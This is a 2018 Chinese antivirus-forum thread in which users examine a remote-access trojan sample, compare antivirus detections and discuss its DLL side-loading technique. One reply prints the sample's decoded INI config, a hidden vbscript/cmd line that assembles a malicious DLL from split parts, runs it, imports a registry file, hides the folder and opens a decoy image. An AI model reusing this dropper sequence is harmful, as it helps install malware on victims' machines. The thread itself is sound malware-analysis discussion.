楼主: 租车司机
收起左侧

[病毒样本] 超强远控木马!!

  [复制链接]
ELOHIM
发表于 2018-6-4 20:53:34 | 显示全部楼层
PercyDan 发表于 2018-6-4 20:52
乱码什么鬼。。。

我不会解密,求大神帮忙………………
kxmp
发表于 2018-6-4 20:55:06 | 显示全部楼层
本帖最后由 kxmp 于 2018-6-4 20:57 编辑

eset

https://www.virustotal.com/zh-cn ... nalysis/1528116755/
有人来双击么?!?!
mcafee的试下 看看然后能不能拉黑?


评分

参与人数 1人气 +1 收起 理由
驭龙 + 1 版区有你更精彩: )

查看全部评分

PercyDan
发表于 2018-6-4 20:55:20 | 显示全部楼层
ELOHIM 发表于 2018-6-4 20:53
我不会解密,求大神帮忙………………

解密什么
杰伦J时代
发表于 2018-6-4 20:57:35 | 显示全部楼层
管家既然杀啦?
ELOHIM
发表于 2018-6-4 20:57:45 | 显示全部楼层



这个配置文件。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
PercyDan
发表于 2018-6-4 20:58:51 | 显示全部楼层
ELOHIM 发表于 2018-6-4 20:57
这个配置文件。。

我也不会
kxmp
发表于 2018-6-4 21:00:58 | 显示全部楼层
ELOHIM 发表于 2018-6-4 20:57
这个配置文件。。

双击看看mcafee之类的能不能自己研究出来 (机器学习 或者云)
看看他之后能不能拉黑才有意思....

那个dll是拆分成2个文件的
然后白加黑还必须载入另一个白dll
这个dll会再载入那个log文件. 不知道那个nv的dll是否是经过修改的.
ELOHIM
发表于 2018-6-4 21:02:40 | 显示全部楼层
kxmp 发表于 2018-6-4 21:00
双击看看mcafee之类的能不能自己研究出来 (机器学习 或者云)
看看他之后能不能拉黑才有意思....

可是洁癖不想安装mcafee。。

就是这个ini文件,怎么看到源码呢。。。

这种编码是unicode还是ascII ??
kxmp
发表于 2018-6-4 21:16:00 | 显示全部楼层
本帖最后由 kxmp 于 2018-6-4 21:17 编辑
ELOHIM 发表于 2018-6-4 21:02
可是洁癖不想安装mcafee。。

就是这个ini文件,怎么看到源码呢。。。

我意思楼上那几人 要是有沙盘的话跑一下...
ini是记事本的bug
xx
cls
[game]
gameExec=TD\nircmd.exe
para=vbscript:createobject("wscript.shell").run("cmd.exe /c md C:\TD© TD\TD\* C:\TD\© /b TD\TD\head+TD\TD\tale C:\TD\bugrpt.dll&start C:\TD\Runtime.exe®edit /s TD\1.reg&attrib +s +h c:\td&start TD\1.jpg",0)(window.close)

PercyDan
发表于 2018-6-4 21:19:00 | 显示全部楼层
kxmp 发表于 2018-6-4 21:00
双击看看mcafee之类的能不能自己研究出来 (机器学习 或者云)
看看他之后能不能拉黑才有意思....

咖啡双击miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-26 09:16 , Processed in 0.119076 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表